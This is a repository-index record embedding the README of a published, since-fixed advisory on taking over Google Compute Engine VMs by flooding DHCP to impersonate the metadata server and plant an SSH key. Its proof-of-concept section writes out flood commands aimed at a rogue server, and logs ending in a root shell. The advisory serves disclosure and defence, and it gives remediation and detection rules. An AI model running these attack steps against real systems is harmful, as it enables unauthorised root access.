{"id":13542911,"url":"https://github.com/irsl/gcp-dhcp-takeover-code-exec","last_synced_at":"2025-04-05T17:08:45.311Z","repository":{"id":43904897,"uuid":"380295867","full_name":"irsl/gcp-dhcp-takeover-code-exec","owner":"irsl","description":"Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent","archived":false,"fork":false,"pushed_at":"2021-07-30T18:56:39.000Z","size":33,"stargazers_count":535,"open_issues_count":5,"forks_count":35,"subscribers_count":20,"default_branch":"main","last_synced_at":"2025-03-29T16:09:50.177Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/irsl.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-06-25T16:28:06.000Z","updated_at":"2025-03-03T20:39:28.000Z","dependencies_parsed_at":"2022-08-12T10:51:43.838Z","dependency_job_id":null,"html_url":"https://github.com/irsl/gcp-dhcp-takeover-code-exec","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irsl%2Fgcp-dhcp-takeover-code-exec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irsl%2Fgcp-dhcp-takeover-code-exec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irsl%2Fgcp-dhcp-takeover-code-exec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irsl%2Fgcp-dhcp-takeover-code-exec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/irsl","download_url":"https://codeloa
d.github.com/irsl/gcp-dhcp-takeover-code-exec/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247369952,"owners_count":20927928,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T11:00:19.700Z","updated_at":"2025-04-05T17:08:45.290Z","avatar_url":"https://github.com/irsl.png","language":"Go","funding_links":[],"categories":["Writeups:","Go","Mobile"],"sub_categories":["2021:","GCP/Google"],"readme":"# Abstract\r\n\r\nThis was an advisory about an unpatched vulnerability (at the time of publishing this repo, 2021-06-25) affecting \r\nvirtual machines in Google's Compute Engine platform. Google has since fixed the flaw (as of 2021-07-30).\r\nThe technical details below are almost exactly the same as in my report sent to the VRP team.\r\n\r\nAttackers could take over virtual machines of the Google Cloud Platform over the network due to weak \r\nrandom numbers used by the ISC DHCP software and an unfortunate combination of additional factors.\r\nThis is done by impersonating the Metadata server from the targeted virtual machine's point of view.\r\nBy mounting this exploit, the attacker can grant access to themselves over SSH (public key authentication) \r\nand then log in as the root user.\r\n\r\n\r\n# The vulnerability\r\n\r\nISC's implementation of the DHCP client (isc-dhcp-client package on the Debian flavors) relies on\r\nrandom(3) to generate pseudo-random numbers (a nonlinear additive feedback random number generator). 
\r\nIt is [seeded](https://github.com/isc-projects/dhcp/blob/master/client/dhclient.c) with the srandom function as follows:\r\n\r\n```\r\n\t/* Make up a seed for the random number generator from current\r\n\t   time plus the sum of the last four bytes of each\r\n\t   interface's hardware address interpreted as an integer.\r\n\t   Not much entropy, but we're booting, so we're not likely to\r\n\t   find anything better. */\r\n\tseed = 0;\r\n\tfor (ip = interfaces; ip; ip = ip-\u003enext) {\r\n\t\tint junk;\r\n\t\tmemcpy(\u0026junk,\r\n\t\t       \u0026ip-\u003ehw_address.hbuf[ip-\u003ehw_address.hlen -\r\n\t\t\t\t\t    sizeof seed], sizeof seed);\r\n\t\tseed += junk;\r\n\t}\r\n\tsrandom(seed + cur_time + (unsigned)getpid());\r\n```\r\n\r\nThis effectively consists of 3 components:\r\n\r\n- the current unixtime when the process is started\r\n\r\n- the pid of the dhclient process\r\n\r\n- the sum of the last 4 bytes of the ethernet addresses (MAC) of the network interface cards\r\n\r\nOn the Google Cloud Platform, the virtual machines usually have only 1 NIC, something like this:\r\n\r\n```\r\nroot@test-instance-1:~/isc-dhcp-client/real3# ifconfig\r\nens4: flags=4163\u003cUP,BROADCAST,RUNNING,MULTICAST\u003e  mtu 1460\r\n        inet 10.128.0.2  netmask 255.255.255.255  broadcast 10.128.0.2\r\n        inet6 fe80::4001:aff:fe80:2  prefixlen 64  scopeid 0x20\u003clink\u003e\r\n        ether 42:01:0a:80:00:02  txqueuelen 1000  (Ethernet)\r\n        RX packets 1336873  bytes 128485980 (122.5 MiB)\r\n        RX errors 0  dropped 0  overruns 0  frame 0\r\n        TX packets 5708403  bytes 2012678044 (1.8 GiB)\r\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\r\n```\r\n\r\nNote that the last 4 bytes (`0a:80:00:02`) of the MAC address (`42:01:0a:80:00:02`) are actually the same as \r\nthe internal IP address of the box (`10.128.0.2`). This means, 1 of the 3 components is effectively public.\r\n\r\nThe pid of the dhclient process is predictable. 
The Linux kernel assigns process IDs sequentially.\r\nI found that the pid varies between 290 and 315 (by rebooting a Debian 10 based VM many times and \r\nchecking the pid), making this component of the seed easily predictable.\r\n\r\nThe unix time component has a broader domain, but this turns out not to be a practical problem (see later).\r\n\r\nThe firewall/router of GCP blocks broadcast packets sent by VMs, so only the metadata server (169.254.169.254)\r\nreceives them. However, some phases of the DHCP protocol don't rely on broadcasts, and the packets to be sent\r\ncan be easily calculated and sent in advance.\r\n\r\nTo mount this attack, the attacker needs to craft multiple DHCP packets using a set of precalculated/suspected \r\nXIDs and flood the victim's dhclient directly (no broadcasts here). If the XID is correct, the victim machine applies \r\nthe network configuration. This is a race condition, but since the flood is fast and exhaustive, the metadata server \r\nhas no real chance to win.\r\n\r\nAt this point the attacker is in a position to reconfigure the network stack of the victim.\r\n\r\nGoogle heavily relies on the Metadata server, including for the distribution of ssh public keys. \r\nThe connection is secured at the network/routing layer and the server is not authenticated (no TLS, clear \r\nhttp only). The `google_guest_agent` process, which is responsible for processing the responses of the\r\nMetadata server, establishes the connection via the virtual hostname `metadata.google.internal`, which\r\nis an alias in the `/etc/hosts` file. This file is managed by `/etc/dhcp/dhclient-exit-hooks.d/google_set_hostname`,\r\na hook that runs as part of the DHCP response processing, and the alias is normally added by this script at each \r\nDHCPACK.\r\nBy having full control over DHCP, the Metadata server can be impersonated. 
This attack was found and \r\ndocumented by `Chris Moberly`, who inspired my research with his oslogin privesc write-up here:\r\n\r\nhttps://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-tech-notes/-/tree/master/oslogin-privesc-june-2020\r\n\r\nThe difference is that in my attack the flooding of the dhclient process is done remotely and the XIDs are guessed.\r\n\r\nThe attack consists of 2 phases:\r\n\r\n#1. Instructing the client to set the IP address of the rogue metadata server on the NIC.\r\nNo router is configured. This effectively cuts the internet connection of the box. \r\n`google_guest_agent` can't fall back to connecting to the real metadata server.\r\nThis DHCP lease is short lived (15 seconds), so dhclient soon sends a DHCPREQUEST again and starts looking \r\nfor a new DHCPACK. \r\n\r\nSince a new IP address (the rogue metadata server) and a new hostname (`metadata.google.internal`) are part of this\r\nDHCPACK packet, the `google_set_hostname` function adds two lines like the ones below (35.209.180.239 is the rogue \r\nmetadata server I used):\r\n\r\n35.209.180.239 metadata.google.internal metadata  # Added by Google\r\n169.254.169.254 metadata.google.internal  # Added by Google\r\n\r\n\r\nThe attacker is still flooding at this point, and since ARP is not flushed quickly, these packets are \r\nstill delivered.\r\n\r\n#2. Restoring a working network stack, along with the valid router address. This DHCPACK does not contain a hostname,\r\nso `google_set_hostname` won't touch `/etc/hosts`. The poisoned `metadata.google.internal` entry remains in there.\r\n\r\nIn case multiple entries are present in the hosts file, the Linux kernel prioritizes the link-local address \r\n(169.254.169.254) lower than the routable ones.\r\n\r\nAt this point `google_guest_agent` can establish a TCP connection to the (rogue) metadata server, where it gets\r\na config that contains the attacker's ssh public key. 
The entry is populated into `/root/.ssh/authorized_keys`\r\nand the attacker can open a root shell remotely.\r\n\r\n\r\n# Attack scenarios\r\n\r\nAttackers would gain full access to the targeted virtual machines in all attack scenarios below.\r\n\r\n- Attack #1: Targeting a VM on the same subnet (~same project), while it is rebooting.\r\n  The attacker needs presence on another host.\r\n\r\n- Attack #2: Targeting a VM on the same subnet (~same project), while it is refreshing the lease (so no reboot is needed).\r\n  This takes place every half an hour (1800s), making 48 windows/attempts possible a day. \r\n  Since an F class VM has ~170,000 pps (packets per second), and a day of unixtime + potential pids makes ~86420 potential \r\n  XIDs, this is a feasible attack vector.\r\n  \r\n- Attack #3: Targeting a VM over the internet. This requires the firewall in front of the victim VM to be fully open. \r\n  Probably not a common scenario, but since even the webui of GCP Cloud Console has an option for that, there must be \r\n  quite a few VMs with this configuration. \r\n  In this case the attacker also needs to guess the internal IP address of the VM, but since the first VM always seems \r\n  to get `10.128.0.2`, the attack could still work.\r\n\r\n\r\n\r\n# Proofs of concept\r\n\r\n## Attack #1\r\n\r\nAs described above, you need to run a rogue metadata server on a host with port 80 reachable from the internet. \r\nI used 35.209.180.239 for this purpose (this is the public IP address of 10.128.0.2, a compute engine box actually), \r\nmeta.py is running here:\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./meta.py\r\n\tUsage: ./meta.py id_rsa.pub\r\n\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./meta.py id_rsa.pub\r\n```\r\n\r\nMy proof of concept exploits a simplified setup in which the victim box is being rebooted. 
In this case unixtime\r\nof the dhclient process can be guessed easily.\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./takeover-at-reboot.pl\r\n\tUsage: ./takeover-at-reboot.pl victim-ip-address meta-ip-address\r\n```\r\n\r\nThe victim box is `10.128.0.4` here. The public IP address of this host is `34.67.219.89`.\r\nVerifying first we don't have access using the RSA private key that belongs to id_rsa.pub referenced above \r\nfor meta.py:\r\n\r\n```\r\n\troot@builder:/opt/_tmp/dhcp/exploit# ssh -i id_rsa root@34.67.219.89\r\n\tPermission denied (publickey).\r\n```\r\n\r\nThen the attack is started:\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./takeover-at-reboot.pl 10.128.0.4 35.209.180.239\r\n\r\n\t10.128.0.4: alive: 1601231808...\r\n```\r\n\r\nThen I type reboot on the victim host (`10.128.0.4`). The rest of the output of `takeover-at-reboot.pl`:\r\n\t\r\n```\r\n\t10.128.0.4 seems to be not alive anymore\r\n\tRUN: ip addr show dev ens4 | awk '/inet / {print $2}' | cut -d/ -f1\r\n\tRUN: ip route show default | awk '/via/ {print $3}'\r\n\tNIC: ens4\r\n\tMin pid: 290\r\n\tMax pid: 315\r\n\tMin ts: 1601231808\r\n\tMax ts: 1601231823\r\n\tMy IP: 10.128.0.2\r\n\tRouter: 10.128.0.1\r\n\tTarget IP: 10.128.0.4\r\n\tTarget MAC: 42:01:0a:80:00:04\r\n\tNumber of potential xids: 41\r\n\tInitial OFFER+ACK flood\r\n\tMAC: 42:01:0a:80:00:04\r\n\tSrc IP: 10.128.0.2\r\n\tDst IP: 10.128.0.4\r\n\tNew IP: 35.209.180.239\r\n\tNew hostname: metadata.google.internal\r\n\tNew route:\r\n\tACK: true\r\n\tOffer: true\r\n\tOneshot: false\r\n\tFlooding again to revert the original network config\r\n\tMAC: 42:01:0a:80:00:04\r\n\tSrc IP: 10.128.0.2\r\n\tDst IP: 10.128.0.4\r\n\tNew IP: 10.128.0.4\r\n\tNew hostname:\r\n\tNew route: 10.128.0.1\r\n\tACK: true\r\n\tOffer: false\r\n\tOneshot: false\r\n```\r\n\r\nAfter this point, the output of the screen where meta.py is running is flooded with lines like this:\r\n\r\n```\r\n\t34.67.219.89 - - [27/Sep/2020 18:40:06] 
\"GET /computeMetadata/v1//?recursive=true\u0026alt=json\u0026wait_for_change=true\u0026timeout_sec=60\u0026last_etag=NONE HTTP/1.1\" 200 -\r\n```\r\n\r\nAt this point, I can login to victim box using the new (attacker controlled) SSH key.\r\n\r\n```\r\n\troot@builder:/opt/_tmp/dhcp/exploit# ssh -i id_rsa root@34.67.219.89\r\n\tLinux metadata 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64\r\n\r\n\tThe programs included with the Debian GNU/Linux system are free software;\r\n\tthe exact distribution terms for each program are described in the\r\n\tindividual files in /usr/share/doc/*/copyright.\r\n\r\n\tDebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\r\n\tpermitted by applicable law.\r\n\troot@metadata:~# id\r\n\tuid=0(root) gid=0(root) groups=0(root),1000(google-sudoers)\r\n```\r\n\r\nThis was tested using the official Debian 10 images.\r\n\r\n\r\n\r\n\r\n## Attack #2\r\n\r\nTo verify this setup, I built a slightly modified version of dhclient; besides some additional log lines the only important change is the \r\nincreased frequency of lease renewals:\r\n\r\n```\r\n*** dhclient.c.orig     2020-09-29 23:38:16.322296529 +0200\r\n--- dhclient.c  2020-09-29 22:51:11.000000000 +0200\r\n*************** void bind_lease (client)\r\n*** 1573,1578 ****\r\n--- 1573,1580 ----\r\n          client-\u003enew = NULL;\r\n\r\n          /* Set up a timeout to start the renewal process. */\r\n+         client-\u003eactive-\u003erenewal = cur_time + 5; // hack!\r\n+\r\n          tv.tv_sec = client-\u003eactive-\u003erenewal;\r\n          tv.tv_usec = ((client-\u003eactive-\u003erenewal - cur_tv.tv_sec) \u003e 1) ?\r\n                          myrandom(\"active renewal\") % 1000000 : cur_tv.tv_usec;\r\n```\r\n\r\n\r\nA 10 minute window consists of ~600 potetial XIDs. I rebooted the victim host (`10.128.0.4`), logged in, ran\r\n`journalctl -f|grep dhclient` to see what is going on. 
Then I executed the `takeover-at-renew.pl` script \r\non the attacker machine (internal ip: `10.128.0.2`, external ip: `35.209.180.239`, a VM on the same subnet):\r\n\r\n```\r\n# ONESHOT_WINDOW_MIN=10 ./takeover-at-renew.pl 10.128.0.4 35.209.180.239\r\n```\r\n\r\nThis resulted the following log lines on the victim machine:\r\n\r\n```\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:10 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:10 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:11 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:31 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:31 test-instance-2 dhclient[301]: 
DHCPACK of 35.209.180.239 from 10.128.0.2\r\nOct 02 07:06:32 metadata dhclient[301]: bound to 35.209.180.239 -- renewal in 5 seconds.\r\nOct 02 07:06:37 metadata dhclient[301]: DHCPREQUEST for 35.209.180.239 on ens4 to 35.209.180.239 port 67\r\nOct 02 07:06:44 metadata dhclient[301]: DHCPREQUEST for 35.209.180.239 on ens4 to 35.209.180.239 port 67\r\nOct 02 07:06:46 metadata dhclient[301]: DHCPACK of 10.128.0.4 from 10.128.0.2\r\nOct 02 07:06:47 metadata dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\n```\r\n\r\nThis means the 6th round was successful. With \"normal\" lease renewal (unpatched `dhclient`), the same thing would have \r\ntaken ~3 hours.\r\n\r\nThe attack was indeed successful:\r\n\r\n```\r\nroot@test-instance-2:~# cat /etc/hosts\r\n127.0.0.1       localhost\r\n::1             localhost ip6-localhost ip6-loopback\r\nff02::1         ip6-allnodes\r\nff02::2         ip6-allrouters\r\n\r\n35.209.180.239 metadata.google.internal metadata  # Added by Google\r\n169.254.169.254 metadata.google.internal  # Added by Google\r\n```\r\n\r\nI repeated the attack and flooded the victim with 3 hours of XIDs (~10000). The 51st DHCPREQUEST was hijacked (this would \r\nhave taken a little bit more than a complete day with \"normal\" lease times).\r\nI concluded that the execution time indeed correlates with the number of XIDs. \r\nThis of course would decrease the success rate in real life setups, but the attack is still feasible.\r\n\r\n\r\n## Attack #3\r\n\r\nA prerequisite of this attack is that the GCP firewall is effectively turned off.\r\n\r\nI found that my DHCP related packets were not forwarded to the VM while the VM was rebooting (probably not after the \r\nlease is returned at reboot), effectively ruling out `takeover-at-discover.pl`.\r\n\r\nI decided to carry out an attack against the lease renewal (effectively the same as #2). 
My expectation was that it should\r\nstill be feasible.\r\n\r\nI tested this scenario using an AWS VM as the attacker machine and a really short time window (2 minutes).\r\nThe `meta.py` script was still running on the GCP attacker machine (external ip: 35.209.180.239).\r\nI rebooted the victim machine (internal ip: `10.128.0.4`, external ip: `34.122.27.253`), logged in, ran `journalctl -f|grep dhclient`.\r\n\r\nThen on the AWS attacker machine (external ip: `3.136.97.244`), I executed this command:\r\n\r\n```\r\nroot@ip-172-31-25-197:~/real8# NIC=eth0 ONESHOT_WINDOW_MIN=2 FINAL_IP=10.128.0.4 MY_ROUTER=10.128.0.1 ./takeover-at-renew.pl 34.122.27.253  35.209.180.239\r\nFlooding destination between with XIDs between 1601651865 and 1601651984\r\nRUN: ip addr show dev eth0 | awk '/inet / {print $2}' | cut -d/ -f1\r\nRUN: /root/real8/randr 10.128.0.4 290 315 1601651865 1601651984 2\u003e/dev/null | paste -sd ',' - \u003e/tmp/xids.txt\r\nNIC: eth0\r\nMin pid: 290\r\nMax pid: 315\r\nMin ts: 1601651865\r\nMax ts: 1601651984\r\nAttacker IP: 172.31.25.197\r\nRouter: 10.128.0.1\r\nTarget IP (initial phase): 34.122.27.253\r\nTarget MAC: 42:01:0a:80:00:04\r\nTarget IP (final phase): 10.128.0.4\r\n34.122.27.253 is alive\r\nStart flooding the victim for 1801 sec\r\nAnd monitoring it in the background\r\nRunning for 1801 sec in the background: /root/real8/flood -ack -lease 15 -dev eth0 -dstip 34.122.27.253 -newhost metadata.google.internal -newip 35.209.180.239 -srcip 172.31.25.197 -mac 42:01:0a:80:00:04 -xidfile /tmp/xids.txt\r\nMAC: 42:01:0a:80:00:04\r\nSrc IP: 172.31.25.197\r\nDst IP: 34.122.27.253\r\nNew IP: 35.209.180.239\r\nNew hostname: metadata.google.internal\r\nNew route:\r\nACK: true\r\nOffer: false\r\nOneshot: false\r\nNumber of XIDs: 145\r\nThe host is down, it probably swallowed the poison ivy!\r\nAnd now some flood again to revert connectivity\r\nit seems the attack was successful\r\nroot@ip-172-31-25-197:~/real8# Running for 12 sec in the background: 
/root/real8/flood -ack -ack -lease 1800 -dev eth0 -dstip 34.122.27.253 -newip 10.128.0.4 -route 10.128.0.1 -srcip 172.31.25.197 -mac 42:01:0a:80:00:04 -xidfile /tmp/xids.txt\r\nMAC: 42:01:0a:80:00:04\r\nSrc IP: 172.31.25.197\r\nDst IP: 34.122.27.253\r\nNew IP: 10.128.0.4\r\nNew hostname:\r\nNew route: 10.128.0.1\r\nACK: true\r\nOffer: false\r\nOneshot: false\r\nNumber of XIDs: 145\r\n```\r\n\r\nThis was running for a while and finally succeeded at the 21st DHCPREQUEST. With normal lease times this would have taken ~11 hours.\r\nThe metadata server was taken over successfully:\r\n\r\n```\r\nOct 02 15:21:30 test-instance-2 dhclient[301]: DHCPACK of 35.209.180.239 from 3.136.97.244\r\nOct 02 15:21:30 metadata dhclient[301]: bound to 35.209.180.239 -- renewal in 5 seconds.\r\n```\r\n\r\nThe hosts file was modified as expected:\r\n\r\n```\r\nroot@test-instance-2:~# cat /etc/hosts\r\n127.0.0.1       localhost\r\n::1             localhost ip6-localhost ip6-loopback\r\nff02::1         ip6-allnodes\r\nff02::2         ip6-allrouters\r\n\r\n35.209.180.239 metadata.google.internal metadata  # Added by Google\r\n169.254.169.254 metadata.google.internal  # Added by Google\r\n```\r\n\r\nI also got some connections from the osconfig agent (the kept-alive connection of the guest agent probably survived the network change):\r\n\r\n```\r\n34.122.27.253 - - [02/Oct/2020 15:29:09] \"PUT /computeMetadata/v1/instance/guest-attributes/guestInventory/Hostname HTTP/1.1\" 501 -\r\n```\r\n\r\nWhen I repeated this attack (2 minute XID window still), the 5th round was successful (2.5 hours with normal leases).\r\n\r\n\r\nConclusion about attacks #2 and #3: not the most reliable thing on earth, but definitely possible. 
I think if I kept the victim host down\r\nlonger than the TCP read timeout of google_guest_agent, the existing metadata server connection would be interrupted, and \r\nwhen the agent reinitiated the connection after network connectivity was restored, it would hit the fake metadata server.\r\n\r\n\r\n\r\n# Remediation\r\n\r\n- Get in touch with ISC. They really need to improve the srandom setup. Maybe get a new feature added that drops packets from \r\n  non-legitimate DHCP servers (so you could rely on this as an additional security measure).\r\n- Even if ISC has improved their software, it won't be upgraded on most of your VMs. Analyze your firewall logs to learn \r\n  if you have any clients that rely on these ports for any legitimate reasons.\r\n  Block udp/68 between VMs, so that only the metadata server could carry out DHCP.\r\n- Stop using the Metadata server via this virtual hostname (metadata.google.internal). At least in your official agents.\r\n- Stop managing the virtual hostname (metadata.google.internal) via DHCP. The IP address is documented to be stable anyway.\r\n- Secure the communication with the Metadata server by using TLS, at least in your official agents.\r\n\r\nNote, using a randomly generated MAC address wouldn't prevent mounting the attack on the same subnet.\r\n\r\n# FAQ\r\n\r\n** - The issue seems generic. Are other cloud providers affected as well? **\r\n\r\n- I checked only the major ones; they were not affected (at least at the time of checking) due to other factors \r\n  (e.g. not using DHCP by default).\r\n\r\n** - If Google doesn't fix this, what can I do? **\r\n\r\n- Google usually closes bug reports with status \"Unfeasible\" when the efforts required to fix outweigh the risk. \r\n  This is not the case here. 
I think there is some technical complexity in the background, which prevents\r\n  them from deploying a network level protection measure easily.\r\n  Until the fix arrives, consider one of the following:\r\n  - don't use DHCP\r\n  - set up a host level firewall rule to ensure the DHCP communication comes from the metadata server (169.254.169.254)\r\n  - set up a GCP/VPC/Firewall rule blocking udp/68 as is (all source, all destination) [more info](https://github.com/irsl/gcp-dhcp-takeover-code-exec/issues/4#issuecomment-872145234)\r\n\r\nGoogle's official guidance for blocking untrusted internal traffic that could exploit this flaw:\r\n\r\n---\r\n\u003e To block incoming traffic over UDP port 68, adjust the following gCloud command syntax for your environment:\r\n\u003e \r\n\u003e ```\r\n\u003e gcloud --project=\u003cyour-project\u003e compute firewall-rules create block-dhcp --action=DENY --rules=udp:68 --network=\u003cyour-network\u003e --priority=100\r\n\u003e ```\r\n\u003e \r\n\u003e * The above command will create a firewall rule named `\"block-dhcp\"` in the specified project and VPC that will block all inbound traffic over UDP port 68 \r\n\u003e * Setting the priority to `100` gives the rule a high priority, but other values can be used. We recommend setting this value [as low as possible](https://cloud.google.com/vpc/docs/firewalls#priority_order_for_firewall_rules) to prevent other rules from superseding it \r\n\u003e * The command will need to be executed for each VPC you wish to block DHCP on by replacing `\u003cyour-network\u003e` with the respective VPC\r\n\u003e * Note that firewall rule names cannot be reused within the same project; multiple rules for different VPCs in a project will need to have different names (`block-dhcp2`, `block-dhcp-vpcname`, etc)\r\n\u003e * Additional information on configuring firewall rules can be in Google Cloud documentation [here](https://cloud.google.com/vpc/docs/using-firewalls).\r\n---\r\n\r\n** - How to detect this attack? 
**\r\n\r\nDHCP renewal usually yields only a few packets every 30 minutes (per host). This attack requires sending a flood of\r\nDHCP packets (hundreds of thousands of packets per second). Setting a rate limiter could probably detect or prevent\r\nthe attack:\r\n\r\n```\r\niptables -A INPUT -p udp --dport 68 -m state --state NEW -m recent --set\r\niptables -A INPUT -p udp --dport 68 -m state --state NEW -m recent --update --seconds 1 --hitcount 10 -j LOG --log-prefix \"DHCP attack detected \"\r\n```\r\n\r\n** - What is the internal ID of this bug in Google's bug tracker? **\r\n\r\nhttps://issuetracker.google.com/issues/169519201\r\n\r\n** - Is this a vulnerability of ISC dhclient? **\r\n\r\nWhile a PRNG with more entropy sources could have prevented this flaw from being exploitable in GCP, I still think this is not \r\na vulnerability of their implementation for the following two reasons:\r\n- DHCP XIDs are public (broadcast on the same LAN) anyway\r\n- with regular IP/MAC setups (=where they are not predictable/static) and udp/68 exposed, not even the current \"weak\" PRNG \r\n  would be practically exploitable\r\n\r\nNote: in the meantime, Google has identified an [additional attack vector](https://gitlab.isc.org/isc-projects/dhcp/-/issues/197)\r\nthat gives a local threat actor an MitM position.\r\n\r\n\r\n# Timeline\r\n\r\n* 2020-09-26: Issue identified, attack #1 validated\r\n* 2020-09-27: Reported to Google VRP\r\n* 2020-09-29: VRP triage is complete \"looking into it\"\r\n* 2020-10-02: Further details shared about attack #2 and #3\r\n* 2020-10-07: Accepted, \"Nice catch\"\r\n* 2020-12-02: Update requested about the estimated time of fix\r\n* 2020-12-03: ... 
\"holiday season coming up\"\r\n* 2021-06-07: Asked Google if a fix is coming in a reasonable time, as I'm planning to publish an advisory\r\n* 2021-06-08: Standard response \"we ask for a reasonable advance notice.\"\r\n* 2021-06-25: Public disclosure\r\n* 2021-07-30: \"Our systems show that all the bugs we created based on your report have been fixed by the product team.\"\r\n\r\n# Credits\r\n\r\n[Imre Rad](https://www.linkedin.com/in/imre-rad-2358749b/)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Firsl%2Fgcp-dhcp-takeover-code-exec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Firsl%2Fgcp-dhcp-takeover-code-exec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Firsl%2Fgcp-dhcp-takeover-code-exec/lists"}